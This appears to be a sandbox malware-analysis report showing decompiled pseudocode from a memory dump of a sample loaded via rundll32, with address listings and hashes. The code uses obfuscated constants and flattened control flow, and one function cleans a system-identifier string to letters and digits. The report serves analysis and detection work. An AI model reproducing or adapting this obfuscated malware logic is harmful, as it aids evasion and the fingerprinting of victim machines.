                                                                                                                      0x002b238b
                                                                                                                      0x002b2393
                                                                                                                      0x002b239b
                                                                                                                      0x002b23a3
                                                                                                                      0x002b23ab
                                                                                                                      0x002b23b3
                                                                                                                      0x002b23c9
                                                                                                                      0x002b23ce
                                                                                                                      0x002b23d7
                                                                                                                      0x002b23e2
                                                                                                                      0x002b23ea
                                                                                                                      0x002b23f2
                                                                                                                      0x002b23fa
                                                                                                                      0x002b23fe
                                                                                                                      0x002b2406
                                                                                                                      0x002b240e
                                                                                                                      0x002b241b
                                                                                                                      0x002b241e
                                                                                                                      0x002b2422
                                                                                                                      0x002b2427
                                                                                                                      0x002b242f
                                                                                                                      0x002b2437
                                                                                                                      0x002b2444
                                                                                                                      0x002b2448
                                                                                                                      0x002b2450
                                                                                                                      0x002b2458
                                                                                                                      0x002b2463
                                                                                                                      0x002b246e
                                                                                                                      0x002b2479
                                                                                                                      0x002b2481
                                                                                                                      0x002b248e
                                                                                                                      0x002b2492
                                                                                                                      0x002b249a
                                                                                                                      0x002b24a2
                                                                                                                      0x002b24ae
                                                                                                                      0x002b24b3
                                                                                                                      0x002b24b9
                                                                                                                      0x002b24be
                                                                                                                      0x002b24c6
                                                                                                                      0x002b24d2
                                                                                                                      0x002b24d5
                                                                                                                      0x002b24dc
                                                                                                                      0x002b24e0
                                                                                                                      0x002b24e5
                                                                                                                      0x002b24ed
                                                                                                                      0x002b24f5
                                                                                                                      0x002b24ff
                                                                                                                      0x002b2508
                                                                                                                      0x002b250c
                                                                                                                      0x002b2514
                                                                                                                      0x002b251c
                                                                                                                      0x002b2526
                                                                                                                      0x002b252a
                                                                                                                      0x002b2532
                                                                                                                      0x002b253a
                                                                                                                      0x002b253f
                                                                                                                      0x002b2547
                                                                                                                      0x002b2547
                                                                                                                      0x002b254f
                                                                                                                      0x002b254f
                                                                                                                      0x002b254f
                                                                                                                      0x002b254f
                                                                                                                      0x002b2555
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b255b
                                                                                                                      0x002b262b
                                                                                                                      0x002b2644
                                                                                                                      0x002b2653
                                                                                                                      0x002b266c
                                                                                                                      0x002b2671
                                                                                                                      0x002b267d
                                                                                                                      0x002b2681
                                                                                                                      0x002b2689
                                                                                                                      0x002b268a
                                                                                                                      0x002b268f
                                                                                                                      0x002b2692
                                                                                                                      0x002b2695
                                                                                                                      0x002b2699
                                                                                                                      0x002b26ac
                                                                                                                      0x002b26bb
                                                                                                                      0x002b26c2
                                                                                                                      0x002b26c7
                                                                                                                      0x002b26cb
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b269b
                                                                                                                      0x002b269b
                                                                                                                      0x002b26a2
                                                                                                                      0x002b26a4
                                                                                                                      0x002b26a4
                                                                                                                      0x002b26a7
                                                                                                                      0x002b26a8
                                                                                                                      0x00000000
                                                                                                                      0x002b269b
                                                                                                                      0x002b2567
                                                                                                                      0x002b2621
                                                                                                                      0x00000000
                                                                                                                      0x002b2621
                                                                                                                      0x002b2573
                                                                                                                      0x002b2603
                                                                                                                      0x002b260e
                                                                                                                      0x002b2616
                                                                                                                      0x00000000
                                                                                                                      0x002b2616
                                                                                                                      0x002b257b
                                                                                                                      0x002b25d9
                                                                                                                      0x002b25de
                                                                                                                      0x002b25e1
                                                                                                                      0x00000000
                                                                                                                      0x002b25e1
                                                                                                                      0x002b2583
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b25a1
                                                                                                                      0x002b25b5
                                                                                                                      0x002b25ba
                                                                                                                      0x002b25ba
                                                                                                                      0x002b26dd
                                                                                                                      0x002b280a
                                                                                                                      0x002b280f
                                                                                                                      0x002b2812
                                                                                                                      0x00000000
                                                                                                                      0x002b2812
                                                                                                                      0x002b26e9
                                                                                                                      0x002b27c3
                                                                                                                      0x002b27c4
                                                                                                                      0x002b27c8
                                                                                                                      0x002b27cd
                                                                                                                      0x002b27d3
                                                                                                                      0x002b27e9
                                                                                                                      0x002b27d5
                                                                                                                      0x002b27d7
                                                                                                                      0x002b27dc
                                                                                                                      0x002b27dd
                                                                                                                      0x002b27dd
                                                                                                                      0x00000000
                                                                                                                      0x002b27d3
                                                                                                                      0x002b26f5
                                                                                                                      0x002b2757
                                                                                                                      0x002b2773
                                                                                                                      0x002b277e
                                                                                                                      0x002b2787
                                                                                                                      0x002b2791
                                                                                                                      0x002b2798
                                                                                                                      0x002b279d
                                                                                                                      0x002b27a2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b27a4
                                                                                                                      0x00000000
                                                                                                                      0x002b27a4
                                                                                                                      0x002b26fd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b2703
                                                                                                                      0x002b2727
                                                                                                                      0x002b272c
                                                                                                                      0x002b2731
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b2737
                                                                                                                      0x00000000
                                                                                                                      0x002b2817
                                                                                                                      0x002b2817
                                                                                                                      0x002b282f

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $+E,$f,$E
                                                                                                                      • API String ID: 0-1056989491
                                                                                                                      • Opcode ID: f924d05836e70ef0a09e8ac1d4695ea004385d1c302f03348df483147d80d69e
                                                                                                                      • Instruction ID: e46f24f385e242350f0b455de8645648ce3b167f8f7a49c5b78aeb205fc589bd
                                                                                                                      • Opcode Fuzzy Hash: f924d05836e70ef0a09e8ac1d4695ea004385d1c302f03348df483147d80d69e
                                                                                                                      • Instruction Fuzzy Hash: BA223FB1518380CFD368CF25C58AA9BFBE1FBC4748F10891DE6998A260D7B19959CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002CCC89 Relevance: 5.3, Strings: 4, Instructions: 287COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E002CCC89(intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				void* __ecx;
				void* _t283;
				intOrPtr _t315;
				void* _t316;
				intOrPtr _t320;
				intOrPtr _t324;
				void* _t325;
				intOrPtr* _t328;
				void* _t330;
				void* _t365;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				signed int _t374;
				signed int _t375;
				signed int _t376;
				signed int _t377;
				signed int _t378;
				signed int* _t381;

				_t367 = _a4;
				_t328 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E002BCF25(_t283);
				_v60 = 0x688185;
				_t381 =  &(( &_v116)[4]);
				_v60 = _v60 ^ 0x6a5ee641;
				_t6 =  &_v60; // 0x6a5ee641
				_t365 = 0;
				_t330 = 0xb7d839b;
				_t368 = 0x77;
				_v60 =  *_t6 * 0x53;
				_v60 = _v60 ^ 0x6fa3a48d;
				_v36 = 0x2ce9a9;
				_v36 = _v36 / _t368;
				_v36 = _v36 ^ 0x0000609f;
				_v72 = 0x8d05d4;
				_v72 = _v72 + 0xfffff9ae;
				_v72 = _v72 + 0xfffffb99;
				_v72 = _v72 + 0xffff1821;
				_v72 = _v72 ^ 0x008c133c;
				_v84 = 0xdf93a7;
				_v84 = _v84 + 0x158a;
				_v84 = _v84 | 0xa6edaf65;
				_v84 = _v84 ^ 0xa6ffaf75;
				_v16 = 0x181fb2;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x00000303;
				_v40 = 0xf7fe46;
				_v40 = _v40 >> 4;
				_v40 = _v40 ^ 0x000f7fe4;
				_v96 = 0x7307ab;
				_v96 = _v96 + 0xffff98a0;
				_v96 = _v96 ^ 0x207b23a6;
				_t369 = 7;
				_v96 = _v96 / _t369;
				_v96 = _v96 ^ 0x0493a521;
				_v68 = 0xb0f7c2;
				_v68 = _v68 + 0xa001;
				_v68 = _v68 + 0xf927;
				_t370 = 0x1b;
				_v68 = _v68 / _t370;
				_v68 = _v68 ^ 0x0001298b;
				_v20 = 0x9a8fe8;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x0008eae3;
				_v76 = 0xc447f;
				_v76 = _v76 << 2;
				_v76 = _v76 ^ 0x6da7c905;
				_v76 = _v76 | 0x8e440162;
				_v76 = _v76 ^ 0xefde5c32;
				_v80 = 0xe5293a;
				_v80 = _v80 ^ 0x7ea2fbd4;
				_v80 = _v80 << 6;
				_v80 = _v80 >> 0x10;
				_v80 = _v80 ^ 0x000bb464;
				_v24 = 0xaea513;
				_v24 = _v24 ^ 0xb7e1a43c;
				_v24 = _v24 ^ 0xb74b462d;
				_v28 = 0x6b2191;
				_v28 = _v28 | 0x9c0eb3e2;
				_v28 = _v28 ^ 0x9c639c10;
				_v32 = 0x4e8823;
				_t371 = 0xe;
				_v32 = _v32 / _t371;
				_v32 = _v32 ^ 0x000823cf;
				_v88 = 0x8b37c7;
				_v88 = _v88 + 0x96e4;
				_t372 = 0x63;
				_v88 = _v88 / _t372;
				_t373 = 0x18;
				_v88 = _v88 / _t373;
				_v88 = _v88 ^ 0x000cd8d0;
				_v92 = 0x8ccaf;
				_v92 = _v92 + 0xffff7c77;
				_v92 = _v92 >> 7;
				_t374 = 0x1a;
				_v92 = _v92 * 0x4a;
				_v92 = _v92 ^ 0x000ee576;
				_v100 = 0x6d8220;
				_v100 = _v100 + 0xffffba59;
				_v100 = _v100 / _t374;
				_v100 = _v100 + 0x20d5;
				_v100 = _v100 ^ 0x000e9a10;
				_v104 = 0xccaba6;
				_t375 = 0x29;
				_v104 = _v104 / _t375;
				_t376 = 0x69;
				_v104 = _v104 / _t376;
				_v104 = _v104 + 0xffff1a57;
				_v104 = _v104 ^ 0xfff2229f;
				_v44 = 0x73a08b;
				_v44 = _v44 / _t376;
				_v44 = _v44 ^ 0x0004e5c5;
				_v108 = 0xb1e3bd;
				_v108 = _v108 ^ 0x0f8130c9;
				_v108 = _v108 + 0x5ac4;
				_t377 = 0x21;
				_v108 = _v108 / _t377;
				_v108 = _v108 ^ 0x0077ef5a;
				_v112 = 0x4cec76;
				_t192 =  &_v112; // 0x4cec76
				_v112 =  *_t192 * 0x1a;
				_v112 = _v112 + 0xdd93;
				_v112 = _v112 << 6;
				_v112 = _v112 ^ 0xf432eb29;
				_v116 = 0x879801;
				_v116 = _v116 + 0x9229;
				_v116 = _v116 << 3;
				_v116 = _v116 | 0xee96daec;
				_v116 = _v116 ^ 0xeed13984;
				_v64 = 0x9b79ce;
				_v64 = _v64 >> 0xe;
				_t378 = 0x5f;
				_v64 = _v64 * 0x1e;
				_v64 = _v64 | 0xf7dc9e8a;
				_v64 = _v64 ^ 0xf7d2a70d;
				_v48 = 0x898fb;
				_v48 = _v48 << 0xa;
				_v48 = _v48 * 0x4f;
				_v48 = _v48 ^ 0x9cd9bf24;
				_v52 = 0xd43737;
				_v52 = _v52 << 9;
				_v52 = _v52 / _t378;
				_v52 = _v52 ^ 0x01c68cd1;
				_v56 = 0x1c405f;
				_v56 = _v56 >> 0xa;
				_v56 = _v56 | 0xb1ef7bec;
				_v56 = _v56 ^ 0xb1edddf2;
				do {
					while(_t330 != 0x6ea4fc1) {
						if(_t330 == 0x7f0f713) {
							_push(_t330);
							_push(_t330);
							_t320 = E002C3512(_v8);
							_v12 = _t320;
							if(_t320 != 0) {
								_t330 = 0xa80f622;
								continue;
							}
						} else {
							if(_t330 == 0x7f61550) {
								E002B68DE(_v64, _v48, _v52, _v56, _v12);
							} else {
								if(_t330 == 0xa80f622) {
									_t324 =  *0x2d5c9c; // 0x0
									_t325 = E002BB335(_v100,  *_t367, _v104,  *((intOrPtr*)(_t324 + 0x50)), _v36, _t330, _v40,  &_v8, _v44,  *((intOrPtr*)(_t367 + 4)), _v108, _v112, _v12, _v116, _t330, _v8);
									_t381 =  &(_t381[0xe]);
									if(_t325 == _v96) {
										 *_t328 = _v12;
										_t365 = 1;
										 *((intOrPtr*)(_t328 + 4)) = _v8;
									} else {
										_t330 = 0x7f61550;
										continue;
									}
								} else {
									if(_t330 != 0xb7d839b) {
										goto L14;
									} else {
										_t330 = 0x6ea4fc1;
										continue;
									}
								}
							}
						}
						L18:
						return _t365;
					}
					_t315 =  *0x2d5c9c; // 0x0
					_t316 = E002BB335(_v68,  *_t367, _v20,  *((intOrPtr*)(_t315 + 0x50)), _v60, _t330, _v72,  &_v8, _v76,  *((intOrPtr*)(_t367 + 4)), _v80, _v24, _t365, _v28, _t330, _v84);
					_t381 =  &(_t381[0xe]);
					if(_t316 != _v16) {
						_t330 = 0x33d9eeb;
						goto L14;
					} else {
						_t330 = 0x7f0f713;
						continue;
					}
					goto L18;
					L14:
				} while (_t330 != 0x33d9eeb);
				goto L18;
			}





















































                                                                                                                      0x002ccc8f
                                                                                                                      0x002ccc96
                                                                                                                      0x002ccc99
                                                                                                                      0x002ccca0
                                                                                                                      0x002ccca1
                                                                                                                      0x002ccca3
                                                                                                                      0x002ccca8
                                                                                                                      0x002cccb0
                                                                                                                      0x002cccb3
                                                                                                                      0x002cccbd
                                                                                                                      0x002cccc2
                                                                                                                      0x002cccc4
                                                                                                                      0x002ccccb
                                                                                                                      0x002cccce
                                                                                                                      0x002cccd2
                                                                                                                      0x002cccda
                                                                                                                      0x002cccea
                                                                                                                      0x002cccee
                                                                                                                      0x002cccf6
                                                                                                                      0x002cccfe
                                                                                                                      0x002ccd06
                                                                                                                      0x002ccd0e
                                                                                                                      0x002ccd16
                                                                                                                      0x002ccd1e
                                                                                                                      0x002ccd26
                                                                                                                      0x002ccd2e
                                                                                                                      0x002ccd36
                                                                                                                      0x002ccd3e
                                                                                                                      0x002ccd46
                                                                                                                      0x002ccd4b
                                                                                                                      0x002ccd53
                                                                                                                      0x002ccd5b
                                                                                                                      0x002ccd60
                                                                                                                      0x002ccd68
                                                                                                                      0x002ccd70
                                                                                                                      0x002ccd78
                                                                                                                      0x002ccd84
                                                                                                                      0x002ccd89
                                                                                                                      0x002ccd8f
                                                                                                                      0x002ccd97
                                                                                                                      0x002ccd9f
                                                                                                                      0x002ccda7
                                                                                                                      0x002ccdb3
                                                                                                                      0x002ccdb6
                                                                                                                      0x002ccdba
                                                                                                                      0x002ccdc2
                                                                                                                      0x002ccdca
                                                                                                                      0x002ccdcf
                                                                                                                      0x002ccdd7
                                                                                                                      0x002ccddf
                                                                                                                      0x002ccde4
                                                                                                                      0x002ccdec
                                                                                                                      0x002ccdf4
                                                                                                                      0x002ccdfc
                                                                                                                      0x002cce04
                                                                                                                      0x002cce0c
                                                                                                                      0x002cce11
                                                                                                                      0x002cce16
                                                                                                                      0x002cce1e
                                                                                                                      0x002cce26
                                                                                                                      0x002cce2e
                                                                                                                      0x002cce36
                                                                                                                      0x002cce3e
                                                                                                                      0x002cce46
                                                                                                                      0x002cce4e
                                                                                                                      0x002cce5e
                                                                                                                      0x002cce63
                                                                                                                      0x002cce67
                                                                                                                      0x002cce6f
                                                                                                                      0x002cce77
                                                                                                                      0x002cce85
                                                                                                                      0x002cce8a
                                                                                                                      0x002cce94
                                                                                                                      0x002cce99
                                                                                                                      0x002cce9d
                                                                                                                      0x002ccea5
                                                                                                                      0x002ccead
                                                                                                                      0x002cceb5
                                                                                                                      0x002ccec1
                                                                                                                      0x002ccec4
                                                                                                                      0x002ccec8
                                                                                                                      0x002cced0
                                                                                                                      0x002cced8
                                                                                                                      0x002ccee8
                                                                                                                      0x002cceec
                                                                                                                      0x002ccef4
                                                                                                                      0x002ccefc
                                                                                                                      0x002ccf08
                                                                                                                      0x002ccf0d
                                                                                                                      0x002ccf17
                                                                                                                      0x002ccf1c
                                                                                                                      0x002ccf20
                                                                                                                      0x002ccf28
                                                                                                                      0x002ccf30
                                                                                                                      0x002ccf40
                                                                                                                      0x002ccf46
                                                                                                                      0x002ccf4e
                                                                                                                      0x002ccf56
                                                                                                                      0x002ccf5e
                                                                                                                      0x002ccf6a
                                                                                                                      0x002ccf6d
                                                                                                                      0x002ccf71
                                                                                                                      0x002ccf79
                                                                                                                      0x002ccf81
                                                                                                                      0x002ccf86
                                                                                                                      0x002ccf8a
                                                                                                                      0x002ccf92
                                                                                                                      0x002ccf97
                                                                                                                      0x002ccf9f
                                                                                                                      0x002ccfa7
                                                                                                                      0x002ccfaf
                                                                                                                      0x002ccfb4
                                                                                                                      0x002ccfbc
                                                                                                                      0x002ccfc4
                                                                                                                      0x002ccfce
                                                                                                                      0x002ccfda
                                                                                                                      0x002ccfdb
                                                                                                                      0x002ccfdf
                                                                                                                      0x002ccfe7
                                                                                                                      0x002ccfef
                                                                                                                      0x002ccff7
                                                                                                                      0x002cd001
                                                                                                                      0x002cd005
                                                                                                                      0x002cd00d
                                                                                                                      0x002cd015
                                                                                                                      0x002cd025
                                                                                                                      0x002cd029
                                                                                                                      0x002cd031
                                                                                                                      0x002cd039
                                                                                                                      0x002cd03e
                                                                                                                      0x002cd046
                                                                                                                      0x002cd04e
                                                                                                                      0x002cd04e
                                                                                                                      0x002cd05c
                                                                                                                      0x002cd0f6
                                                                                                                      0x002cd0f7
                                                                                                                      0x002cd0ff
                                                                                                                      0x002cd104
                                                                                                                      0x002cd10f
                                                                                                                      0x002cd115
                                                                                                                      0x00000000
                                                                                                                      0x002cd115
                                                                                                                      0x002cd062
                                                                                                                      0x002cd068
                                                                                                                      0x002cd1af
                                                                                                                      0x002cd06e
                                                                                                                      0x002cd074
                                                                                                                      0x002cd0bc
                                                                                                                      0x002cd0ce
                                                                                                                      0x002cd0d3
                                                                                                                      0x002cd0da
                                                                                                                      0x002cd18f
                                                                                                                      0x002cd191
                                                                                                                      0x002cd196
                                                                                                                      0x002cd0e0
                                                                                                                      0x002cd0e0
                                                                                                                      0x00000000
                                                                                                                      0x002cd0e0
                                                                                                                      0x002cd076
                                                                                                                      0x002cd07c
                                                                                                                      0x00000000
                                                                                                                      0x002cd082
                                                                                                                      0x002cd082
                                                                                                                      0x00000000
                                                                                                                      0x002cd082
                                                                                                                      0x002cd07c
                                                                                                                      0x002cd074
                                                                                                                      0x002cd068
                                                                                                                      0x002cd1b7
                                                                                                                      0x002cd1c0
                                                                                                                      0x002cd1c0
                                                                                                                      0x002cd149
                                                                                                                      0x002cd15e
                                                                                                                      0x002cd163
                                                                                                                      0x002cd16a
                                                                                                                      0x002cd176
                                                                                                                      0x00000000
                                                                                                                      0x002cd16c
                                                                                                                      0x002cd16c
                                                                                                                      0x00000000
                                                                                                                      0x002cd16c
                                                                                                                      0x00000000
                                                                                                                      0x002cd17b
                                                                                                                      0x002cd17b
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: :)$A^j$Zw$vL
                                                                                                                      • API String ID: 0-3297297485
                                                                                                                      • Opcode ID: cb71ab8a0ca33c3c709155bed911e1f49ea9429730edc658db0a60cae110ff4b
                                                                                                                      • Instruction ID: 8eede4b2f25b1ed5c9d5ce72785e62ffd7b97287157bc8b8061b7244fb43a9b9
                                                                                                                      • Opcode Fuzzy Hash: cb71ab8a0ca33c3c709155bed911e1f49ea9429730edc658db0a60cae110ff4b
                                                                                                                      • Instruction Fuzzy Hash: FFD12FB25083819FD764CF65C949A1BFBE1FBC4748F108A2DF29586260C7B69959CF03
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002CA156 Relevance: 5.2, Strings: 4, Instructions: 170COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E002CA156(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v128;
				signed int _v132;
				intOrPtr _v136;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				void* _t133;
				signed int _t146;
				void* _t147;
				void* _t155;
				char* _t156;
				void* _t174;
				signed int _t175;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int* _t183;

				_push(_a12);
				_t174 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002BCF25(_t133);
				_v132 = _v132 & 0x00000000;
				_t183 =  &(( &_v196)[5]);
				_v136 = 0x446ea7;
				_v180 = 0x28766d;
				_t155 = 0x8ee0430;
				_v180 = _v180 | 0x8061b26e;
				_t175 = 0x7a;
				_v180 = _v180 / _t175;
				_v180 = _v180 ^ 0x0107c2a1;
				_v160 = 0x181348;
				_t176 = 0x24;
				_v160 = _v160 / _t176;
				_v160 = _v160 ^ 0x00002248;
				_v192 = 0xf13979;
				_v192 = _v192 + 0xffff8439;
				_v192 = _v192 << 0xb;
				_v192 = _v192 + 0x337f;
				_v192 = _v192 ^ 0x85ec5d3f;
				_v148 = 0x5e6289;
				_v148 = _v148 >> 5;
				_v148 = _v148 ^ 0x00022a63;
				_v184 = 0xe3b806;
				_v184 = _v184 + 0xc2d8;
				_v184 = _v184 | 0x759fad77;
				_v184 = _v184 ^ 0x75f287c1;
				_v168 = 0x566c5d;
				_v168 = _v168 ^ 0x750ff463;
				_v168 = _v168 ^ 0x75584e2a;
				_v152 = 0x83e247;
				_v152 = _v152 ^ 0x81f90c1d;
				_v152 = _v152 ^ 0x81706586;
				_v188 = 0x5c5a6b;
				_v188 = _v188 >> 9;
				_v188 = _v188 << 0xb;
				_v188 = _v188 >> 0xf;
				_v188 = _v188 ^ 0x00030e37;
				_v176 = 0xc154a1;
				_v176 = _v176 | 0xc3f8b8be;
				_t177 = 0x3c;
				_v176 = _v176 * 0x16;
				_v176 = _v176 ^ 0xd77414a9;
				_v164 = 0x5dd26c;
				_v164 = _v164 * 0x18;
				_v164 = _v164 ^ 0x08c2b6d4;
				_v144 = 0x980588;
				_v144 = _v144 << 3;
				_v144 = _v144 ^ 0x04c0143e;
				_v196 = 0xd24b78;
				_v196 = _v196 * 0xf;
				_v196 = _v196 * 7;
				_v196 = _v196 / _t177;
				_v196 = _v196 ^ 0x017222e8;
				_v156 = 0x8c94fd;
				_v156 = _v156 + 0xffff8671;
				_v156 = _v156 ^ 0x0082913e;
				_v172 = 0x17d6e;
				_t178 = 0x63;
				_t146 = _v172 / _t178;
				_v172 = _t146;
				_v172 = _v172 + 0x20ae;
				_v172 = _v172 ^ 0x00044ed7;
				do {
					while(_t155 != 0x2e9bf4f) {
						if(_t155 == 0x570f58c) {
							_push(0x2b1494);
							_push(_v168);
							_t147 = E002BBB4B(_v148, _v184, __eflags);
							E002CD1C1(__eflags, _t174, _v188, _v176, _t147, E002BF154(__eflags), _v164, _v144);
							return E002BAE03(_v196, _v156, _v172, _t147);
						}
						if(_t155 == 0x8ee0430) {
							_t155 = 0xffbee7a;
							continue;
						}
						if(_t155 != 0xffbee7a) {
							goto L17;
						}
						_v140 = 0x80;
						_t146 = E002C3F73(_v180, _v160,  &_v140, _v192,  &_v128);
						_t183 =  &(_t183[3]);
						_t155 = 0x2e9bf4f;
					}
					__eflags = _v128;
					_t156 =  &_v128;
					if(_v128 == 0) {
						L16:
						_t155 = 0x570f58c;
						goto L17;
					} else {
						goto L8;
					}
					do {
						L8:
						_t146 =  *_t156;
						__eflags = _t146 - 0x30;
						if(_t146 < 0x30) {
							L10:
							__eflags = _t146 - 0x61;
							if(_t146 < 0x61) {
								L12:
								__eflags = _t146 - 0x41;
								if(_t146 < 0x41) {
									L14:
									 *_t156 = 0x58;
									goto L15;
								}
								__eflags = _t146 - 0x5a;
								if(_t146 <= 0x5a) {
									goto L15;
								}
								goto L14;
							}
							__eflags = _t146 - 0x7a;
							if(_t146 <= 0x7a) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t146 - 0x39;
						if(_t146 <= 0x39) {
							goto L15;
						}
						goto L10;
						L15:
						_t156 = _t156 + 1;
						__eflags =  *_t156;
					} while ( *_t156 != 0);
					goto L16;
					L17:
					__eflags = _t155 - 0x55e4d43;
				} while (__eflags != 0);
				return _t146;
			}
































                                                                                                                      0x002ca160
                                                                                                                      0x002ca167
                                                                                                                      0x002ca169
                                                                                                                      0x002ca170
                                                                                                                      0x002ca177
                                                                                                                      0x002ca178
                                                                                                                      0x002ca179
                                                                                                                      0x002ca17e
                                                                                                                      0x002ca183
                                                                                                                      0x002ca186
                                                                                                                      0x002ca190
                                                                                                                      0x002ca198
                                                                                                                      0x002ca19d
                                                                                                                      0x002ca1ab
                                                                                                                      0x002ca1b0
                                                                                                                      0x002ca1b6
                                                                                                                      0x002ca1be
                                                                                                                      0x002ca1ca
                                                                                                                      0x002ca1cf
                                                                                                                      0x002ca1d5
                                                                                                                      0x002ca1dd
                                                                                                                      0x002ca1e5
                                                                                                                      0x002ca1ed
                                                                                                                      0x002ca1f2
                                                                                                                      0x002ca1fa
                                                                                                                      0x002ca202
                                                                                                                      0x002ca20a
                                                                                                                      0x002ca20f
                                                                                                                      0x002ca217
                                                                                                                      0x002ca21f
                                                                                                                      0x002ca227
                                                                                                                      0x002ca22f
                                                                                                                      0x002ca237
                                                                                                                      0x002ca23f
                                                                                                                      0x002ca247
                                                                                                                      0x002ca24f
                                                                                                                      0x002ca257
                                                                                                                      0x002ca25f
                                                                                                                      0x002ca267
                                                                                                                      0x002ca26f
                                                                                                                      0x002ca274
                                                                                                                      0x002ca279
                                                                                                                      0x002ca27e
                                                                                                                      0x002ca286
                                                                                                                      0x002ca28e
                                                                                                                      0x002ca29b
                                                                                                                      0x002ca29c
                                                                                                                      0x002ca2a0
                                                                                                                      0x002ca2a8
                                                                                                                      0x002ca2b5
                                                                                                                      0x002ca2b9
                                                                                                                      0x002ca2c1
                                                                                                                      0x002ca2c9
                                                                                                                      0x002ca2ce
                                                                                                                      0x002ca2d6
                                                                                                                      0x002ca2e3
                                                                                                                      0x002ca2ec
                                                                                                                      0x002ca2f6
                                                                                                                      0x002ca2fa
                                                                                                                      0x002ca302
                                                                                                                      0x002ca30a
                                                                                                                      0x002ca312
                                                                                                                      0x002ca31c
                                                                                                                      0x002ca334
                                                                                                                      0x002ca335
                                                                                                                      0x002ca33c
                                                                                                                      0x002ca340
                                                                                                                      0x002ca348
                                                                                                                      0x002ca350
                                                                                                                      0x002ca350
                                                                                                                      0x002ca356
                                                                                                                      0x002ca3cc
                                                                                                                      0x002ca3d1
                                                                                                                      0x002ca3dd
                                                                                                                      0x002ca404
                                                                                                                      0x00000000
                                                                                                                      0x002ca41b
                                                                                                                      0x002ca35e
                                                                                                                      0x002ca38e
                                                                                                                      0x00000000
                                                                                                                      0x002ca38e
                                                                                                                      0x002ca362
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002ca368
                                                                                                                      0x002ca382
                                                                                                                      0x002ca387
                                                                                                                      0x002ca38a
                                                                                                                      0x002ca38a
                                                                                                                      0x002ca392
                                                                                                                      0x002ca397
                                                                                                                      0x002ca39b
                                                                                                                      0x002ca3c0
                                                                                                                      0x002ca3c0
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002ca39d
                                                                                                                      0x002ca39d
                                                                                                                      0x002ca39d
                                                                                                                      0x002ca39f
                                                                                                                      0x002ca3a1
                                                                                                                      0x002ca3a7
                                                                                                                      0x002ca3a7
                                                                                                                      0x002ca3a9
                                                                                                                      0x002ca3af
                                                                                                                      0x002ca3af
                                                                                                                      0x002ca3b1
                                                                                                                      0x002ca3b7
                                                                                                                      0x002ca3b7
                                                                                                                      0x00000000
                                                                                                                      0x002ca3b7
                                                                                                                      0x002ca3b3
                                                                                                                      0x002ca3b5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002ca3b5
                                                                                                                      0x002ca3ab
                                                                                                                      0x002ca3ad
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002ca3ad
                                                                                                                      0x002ca3a3
